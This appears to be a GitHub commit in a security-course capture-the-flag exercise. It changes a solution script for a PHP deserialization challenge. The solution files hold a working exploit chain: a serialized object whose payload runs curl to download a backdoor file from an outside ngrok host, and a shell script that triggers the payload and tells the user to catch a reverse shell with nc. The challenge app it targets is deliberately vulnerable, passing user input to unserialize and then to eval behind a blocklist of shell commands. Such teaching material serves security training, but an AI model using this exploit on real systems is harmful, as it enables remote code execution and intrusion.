Skip to content

Commit

Permalink
Add random name for the backdoor file + format files
Browse files Browse the repository at this point in the history 
Signed-off-by: Carina Deaconu <[email protected]>
  • Loading branch information
@carrrina
carrrina committed Sep 13, 2023
1 parent 32a2e3b commit 356cf11
Show file tree
Hide file tree
Showing 4 changed files with 117 additions and 113 deletions.
1 change: 1 addition & 0 deletions exotic-attacks/activities/handy-tool/sol/backdoor_name.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
f2ft24backdoor.php
23 changes: 12 additions & 11 deletions exotic-attacks/activities/handy-tool/sol/make_backdoor.php
View file
Original file line number Diff line number Diff line change
@@ -1,16 +1,17 @@
<?php
$NGROK_HOST = ""; // TODO: ngrok host (check README.md)
$NGROK_PORT = 0; // TODO: ngrok port (check README.md)
$NGROK_HOST = ""; // TODO: ngrok host (check README.md)
$NGROK_PORT = 0; // TODO: ngrok port (check README.md)

class PHPClass
{
public $condition = true;
public $prop = "";
class PHPClass
{
public $condition = true;
public $prop = "";

public function __construct($host, $port) {
$this->prop = "system('curl http://".$host.":".$port." -o backdoor.php');";
}
}
public function __construct($host, $port) {
$backdoor_name = trim(file_get_contents("backdoor_name.txt"));
$this->prop = "system('curl http://".$host.":".$port." -o $backdoor_name');";
}
}

echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT)));
echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT)));
?>
6 changes: 4 additions & 2 deletions exotic-attacks/activities/handy-tool/sol/solution.sh
View file
Original file line number Diff line number Diff line change
Expand Up @@ -56,7 +56,8 @@ echo
backdoor_payload=$(php ./make_backdoor.php)
curl "$URL/?tool=unserialize&input=$backdoor_payload&submit=Submit" > /dev/null

echo "Step 5: Close the Flask app and open a new connection to your internal port using: \`nc -nlvk 1234\`"
echo "Step 5: Close the Flask app and open a new connection to your internal port using: \`nc -nlv 1234\`"
echo "You might need to add the -p option if you're working inside a VM."
echo "Press any key to continue if you did it."
while [ true ] ; do
read -n 1
Expand All @@ -66,4 +67,5 @@ while [ true ] ; do
done

echo "Finally: Now I am accessing the backdoor; check the \`nc\` terminal..."
curl "$URL""/backdoor.php"
backdoor_name=$(cat backdoor_name.txt)
curl "$URL""/""$backdoor_name"
200 changes: 100 additions & 100 deletions exotic-attacks/activities/handy-tool/src/index.php
View file
Original file line number Diff line number Diff line change
@@ -1,100 +1,100 @@
<?php
class PHPClass {
public $condition;
public $prop;

function __construct() {

}

function __wakeup() {
$forbbiden_commands = [
"cat",
"head",
"grep",
"tail",
"tac",
"rev",
"awk",
"sed",
"more",
"cut",
"nl",
"less",
"sort",
"python",
"perl",
"m4", // similar to `cat`
];

if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) {
return;
}

foreach ($forbbiden_commands as $cmd) {
if (strpos($this->prop, $cmd) !== false) {
return;
}
}

eval($this->prop);
}
}
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
</head>

<body>
<div>
<div class="container">
<div class="row">
<div class="bg-white p-5 mx-auto col-md-8 col-10">
<h3 class="display-3">Handy Tools<br></h3>
<form method="GET">
<div class="form-group">
<label>Select tool</label>
<select name="tool" class="form-control">
<option value="toupper">To Upper Case</option>
<option value="unserialize">Unserialize</option>
<option value="trim">Trim whitespaces</option>
<option value="manny">Guess my last name: Manny...</option>
</select>
</div>
<div class="form-group">
<label>Input</label>
<input name="input" type="text" class="form-control">
<small class="form-text text-muted"></small>
</div>
<?php
if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') {
echo var_dump(strtoupper($_GET['input']));
echo "<br>"; echo "<br>"; echo "<br>";
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') {
echo var_dump(unserialize($_GET['input']));
echo "<br>"; echo "<br>"; echo "<br>";
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') {
echo var_dump(str_replace(' ', '', $_GET['input']));
echo "<br>"; echo "<br>"; echo "<br>";
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') {
if (strtolower($_GET['input']) == 'iscusitul')
echo "backup.zip";
else
echo "Wrong!";
echo "<br>"; echo "<br>"; echo "<br>";
}
?>
<input type="submit" class="btn btn-primary" name="submit" value="Submit" />
</form>
</div>
</div>
</div>
</div>
</body>

</html>
<?php
class PHPClass {
public $condition;
public $prop;

function __construct() {

}

function __wakeup() {
$forbbiden_commands = [
"cat",
"head",
"grep",
"tail",
"tac",
"rev",
"awk",
"sed",
"more",
"cut",
"nl",
"less",
"sort",
"python",
"perl",
"m4", // similar to `cat`
];

if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) {
return;
}

foreach ($forbbiden_commands as $cmd) {
if (strpos($this->prop, $cmd) !== false) {
return;
}
}

eval($this->prop);
}
}
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
</head>

<body>
<div>
<div class="container">
<div class="row">
<div class="bg-white p-5 mx-auto col-md-8 col-10">
<h3 class="display-3">Handy Tools<br></h3>
<form method="GET">
<div class="form-group">
<label>Select tool</label>
<select name="tool" class="form-control">
<option value="toupper">To Upper Case</option>
<option value="unserialize">Unserialize</option>
<option value="trim">Trim whitespaces</option>
<option value="manny">Guess my last name: Manny...</option>
</select>
</div>
<div class="form-group">
<label>Input</label>
<input name="input" type="text" class="form-control">
<small class="form-text text-muted"></small>
</div>
<?php
if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') {
echo var_dump(strtoupper($_GET['input']));
echo "<br>"; echo "<br>"; echo "<br>";
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') {
echo var_dump(unserialize($_GET['input']));
echo "<br>"; echo "<br>"; echo "<br>";
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') {
echo var_dump(str_replace(' ', '', $_GET['input']));
echo "<br>"; echo "<br>"; echo "<br>";
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') {
if (strtolower($_GET['input']) == 'iscusitul')
echo "backup.zip";
else
echo "Wrong!";
echo "<br>"; echo "<br>"; echo "<br>";
}
?>
<input type="submit" class="btn btn-primary" name="submit" value="Submit" />
</form>
</div>
</div>
</div>
</div>
</body>

</html>

0 comments on commit 356cf11

Please sign in to comment.